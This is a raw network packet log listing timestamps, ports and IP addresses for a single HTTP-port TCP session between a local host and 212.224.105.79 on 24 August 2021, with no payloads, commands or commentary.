Aug 24, 2021 08:46:53.455064058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455085993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455089092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.455105066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455138922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.455149889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455173969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455200911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455208063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.455224991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455245972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455266953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455286980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455295086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.455307007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455327034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455328941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.455348969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455369949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455387115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.455420017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.455468893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455495119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455593109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.474078894 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.474370003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.474404097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.474425077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.474446058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.474463940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.474467039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.474487066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.474493980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.474508047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.474529028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.474555016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.474589109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477516890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477571011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477587938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477612019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477633953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477649927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477669954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477679014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477690935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477718115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477727890 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477740049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477760077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477761984 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477780104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477791071 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477801085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477822065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477829933 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477843046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477861881 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477874994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477885008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477906942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477910995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477927923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477948904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.477950096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.477968931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478002071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478022099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478024006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478045940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478065014 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478066921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478084087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478104115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478110075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478126049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478147984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478152037 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478167057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478179932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478188038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478209972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478230000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478233099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478255987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478276014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478276968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478296995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478313923 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478318930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478341103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478362083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478363991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478384018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478410006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478425980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478431940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478454113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478473902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.478478909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.478552103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.483989000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.496953964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497356892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497387886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497410059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497436047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497438908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.497461081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497462034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.497486115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497503042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497520924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.497579098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501296997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501342058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501365900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501389027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501388073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501410007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501410961 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501434088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501450062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501460075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501483917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501506090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501506090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501530886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501547098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501555920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501575947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501595020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501599073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501621962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501635075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501648903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501672983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501684904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501697063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501718998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501732111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501741886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501765966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501781940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501790047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501812935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501828909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501840115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501864910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501877069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501888037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501913071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501935005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501936913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501960039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.501975060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.501982927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502006054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502017975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.502032042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502055883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502065897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.502078056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502101898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502125025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502149105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502151966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.502173901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502192020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.502197027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502222061 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.502224922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502250910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502266884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.502274990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502299070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502321005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.502324104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.502391100 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.502759933 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.506202936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.517544031 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.519551992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.519594908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.519619942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.519643068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.519665956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.519687891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.519705057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.519714117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.519736052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.519752026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.519817114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524355888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524400949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524424076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524450064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524470091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524492979 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524518013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524539948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524563074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524563074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524585009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524626970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524627924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524646997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524657011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524667025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524687052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524703026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524708986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524749994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524756908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524779081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524802923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524806023 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524826050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524848938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524853945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524868011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524888992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524909973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524913073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524938107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.524954081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524975061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524995089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.524997950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525015116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525037050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525043964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525057077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525073051 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525080919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525103092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525124073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525145054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525146008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525166035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525188923 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525208950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525219917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525230885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525252104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525274038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525295019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525307894 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525315046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525335073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525358915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525377035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525378942 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525398016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525418043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.525418997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.525456905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.527100086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.539632082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.539675951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.539700985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.539787054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.541758060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.541796923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.541820049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.541841030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.541866064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.541872978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.541887045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.541908026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.541912079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.541929960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.541956902 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.541985035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547489882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547552109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547574043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547589064 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547597885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547621965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547630072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547643900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547666073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547677994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547687054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547702074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547713041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547736883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547759056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547763109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547781944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547802925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547802925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547823906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547844887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547847986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547873020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547899008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547923088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547924042 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547945023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547957897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.547966957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547988892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.547991991 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548011065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548032999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548033953 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548055887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548082113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548084021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548104048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548125029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548146009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548147917 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548168898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548177958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548192978 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548218012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548223019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548244953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548268080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548269033 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548291922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548315048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548340082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548362970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548384905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548386097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548407078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548415899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548430920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548451900 CEST	49715	80	192.168.2.7	212.224.105.79
